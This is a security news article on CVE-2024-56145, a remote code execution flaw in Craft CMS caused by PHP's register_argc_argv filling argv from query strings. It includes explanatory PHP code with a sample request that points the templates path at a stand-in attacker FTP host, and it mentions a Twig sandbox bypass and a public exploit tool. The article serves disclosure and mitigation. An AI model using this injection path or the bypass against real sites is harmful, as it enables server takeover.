A critical vulnerability in Craft CMS, one of the most widely used PHP-based content management systems, allows unauthenticated remote code execution (RCE) on installations running with default configurations. The flaw, tracked as [CVE-2024-56145](https://nvd.nist.gov/vuln/detail/CVE-2024-56145), was disclosed by security researchers and has already been addressed by the Craft CMS team, which shipped a patch within 24 hours.

PHP, a language that has improved substantially over the years, is no stranger to security problems. Older footguns such as `register_globals` and `magic_quotes_gpc` have been removed from the language, but some remaining quirks in its design can still lead to critical issues. The flaw in [Craft CMS](https://github.com/craftcms) shows how a seemingly innocuous PHP behavior can create an exploitable condition.

At the heart of this vulnerability is PHP's `register_argc_argv` configuration setting. It controls whether `$_SERVER['argc']` and `$_SERVER['argv']` are populated when a script runs. Under the CLI these hold the real command-line arguments, but under web SAPIs PHP fills `$_SERVER['argv']` from the raw query string of the request, split on `+`. PHP's built-in default for the setting is On (the shipped `php.ini-production` template turns it Off), and in Craft CMS's official Docker image the setting is enabled, which is what makes the scenario exploitable there.

**How the Vulnerability Works**

The flaw lies in how Craft CMS processes certain command-line options during its bootstrap sequence.
Specifically, the researchers found that the query string of an HTTP request could supply those options and thereby override the paths of critical files such as configuration files or templates. By controlling those paths, an attacker can make the application load files it never intended to and potentially execute arbitrary code. The researchers demonstrated this by hosting malicious templates on an attacker-controlled FTP server and pointing the templates path at it through PHP's `ftp://` stream wrapper, which let them get past the checks Craft applies to that path and inject executable code into a vulnerable instance.

Further [analysis](https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms) by Adam Kues showed that although Craft CMS attempts to sandbox its template engine (Twig) to prevent malicious code execution, workarounds such as combining the `sort` filter with `call_user_func` bypassed those defenses and achieved RCE.

**Impact and Mitigation**

Craft CMS is used by over 150,000 websites globally, including large enterprises, and the vulnerability posed a significant risk to any organization running the platform with its default configuration. The Craft CMS team acted swiftly, releasing patched versions 5.5.2 and 4.13.2 (and later).
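The following is an added illustration, not Craft CMS code or the researchers' exploit. It models the PHP behavior described above: with `register_argc_argv` on, a web request's query string becomes `$_SERVER['argv']`, so a bootstrap helper that reads CLI options from `argv` without checking the SAPI can be steered by an HTTP request. The helper names and the `--templatesPath` option are hypothetical stand-ins; the query string and argv arrays are constructed sample input. It also shows the hardened form, which checks `PHP_SAPI` before trusting `argv`.

```php
<?php
declare(strict_types=1);

// Added example, not Craft CMS code. It models the PHP footgun behind
// CVE-2024-56145: with register_argc_argv=On, PHP fills $_SERVER['argv'] for
// web requests from the raw query string split on '+', so any code that
// treats argv as proof of a CLI run can be driven by an HTTP request.
// vulnerableCliOption()/hardenedCliOption() and --templatesPath are
// hypothetical stand-ins, not Craft's real helper or flag names.

/** What PHP builds into $_SERVER['argv'] for a non-CLI SAPI: query string split on '+'. */
function argvFromQueryString(string $queryString): array
{
    return $queryString === '' ? [] : explode('+', $queryString);
}

/**
 * Vulnerable pattern: reads CLI-style options from $_SERVER['argv'] without
 * checking which SAPI is running. Every element is scanned, so in the web
 * case argv[0] (the first query segment) is matched like any other option.
 */
function vulnerableCliOption(string $name, array $server): ?string
{
    foreach ($server['argv'] ?? [] as $arg) {
        if (str_starts_with($arg, $name . '=')) {
            return substr($arg, strlen($name) + 1);
        }
    }
    return null;
}

/**
 * Hardened pattern: honor CLI options only when the engine says this is the
 * CLI SAPI. PHP_SAPI is set by the engine, not by the request. $sapi is a
 * parameter only so both SAPIs can be exercised in one script; real code
 * should just compare PHP_SAPI.
 */
function hardenedCliOption(string $name, array $server, string $sapi = PHP_SAPI): ?string
{
    if ($sapi !== 'cli') {
        return null;
    }
    return vulnerableCliOption($name, $server);
}

/**
 * Deployment check: run this from a web-served script, not from `php -r`.
 * True means a non-CLI SAPI with register_argc_argv enabled, i.e. the
 * exposed combination.
 */
function registerArgcArgvExposed(): bool
{
    return PHP_SAPI !== 'cli'
        && filter_var(ini_get('register_argc_argv'), FILTER_VALIDATE_BOOLEAN);
}

// Constructed web request: GET /index.php?--templatesPath=ftp://attacker.example/tpl
$query     = '--templatesPath=ftp://attacker.example/tpl';
$webServer = ['argv' => argvFromQueryString($query), 'argc' => 1];

// Constructed CLI run: php index.php --templatesPath=/srv/templates
$cliServer = ['argv' => ['index.php', '--templatesPath=/srv/templates'], 'argc' => 2];

printf("vulnerable, web SAPI: %s\n", vulnerableCliOption('--templatesPath', $webServer) ?? 'null');
printf("hardened,   web SAPI: %s\n", hardenedCliOption('--templatesPath', $webServer, 'fpm-fcgi') ?? 'null');
printf("hardened,   cli SAPI: %s\n", hardenedCliOption('--templatesPath', $cliServer, 'cli') ?? 'null');
```

Two caveats when using the check. The CLI SAPI forces `register_argc_argv` on regardless of `php.ini`, and on many distributions `php-cli` and `php-fpm` read different `php.ini` files, so `php -i` says nothing about what the web server sees; inspect the value from a request served by the same SAPI that serves the site. The corresponding mitigation is `register_argc_argv = Off` in that SAPI's `php.ini`, followed by a restart of PHP-FPM or the web server.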
Users are strongly advised to upgrade their installations immediately. Those who cannot update yet can set `register_argc_argv = Off` in the `php.ini` used by their web SAPI; this is an effective workaround for this specific vulnerability because it stops PHP from populating `$_SERVER['argv']` from the query string.

This incident underscores the importance of understanding PHP's nuanced behaviors when building secure applications. Code that needs to know whether it is running from the command line should check `PHP_SAPI` (or `php_sapi_name()`), which is set by the engine itself, rather than relying on ambiguous indicators such as the presence of `$_SERVER['argv']`, which a web request can populate. The rapid response by both the researchers and the Craft CMS team highlights the value of responsible disclosure and prompt patching in limiting the impact of security vulnerabilities.

While PHP has matured significantly as a language, its legacy behaviors continue to challenge developers and security professionals alike. CVE-2024-56145 is a reminder that a small misconfiguration or an overlooked feature can have severe consequences once attackers exploit it. A public **[CVE-2024-56145 exploitation tool](https://github.com/Chocapikk/CVE-2024-56145)** has also been released on GitHub, allowing attackers to achieve RCE with specially crafted payloads, which makes prompt patching all the more urgent. Organizations must remain vigilant by keeping their software up to date and adopting secure coding practices to protect their systems from emerging threats.

The post [Critical PHP Zero-Day Vulnerability in Craft CMS Lets Hackers Gain Remote Access](https://cybersecuritynews.com/php-zero-day-vulnerability/) appeared first on [Cyber Security News](https://cybersecuritynews.com).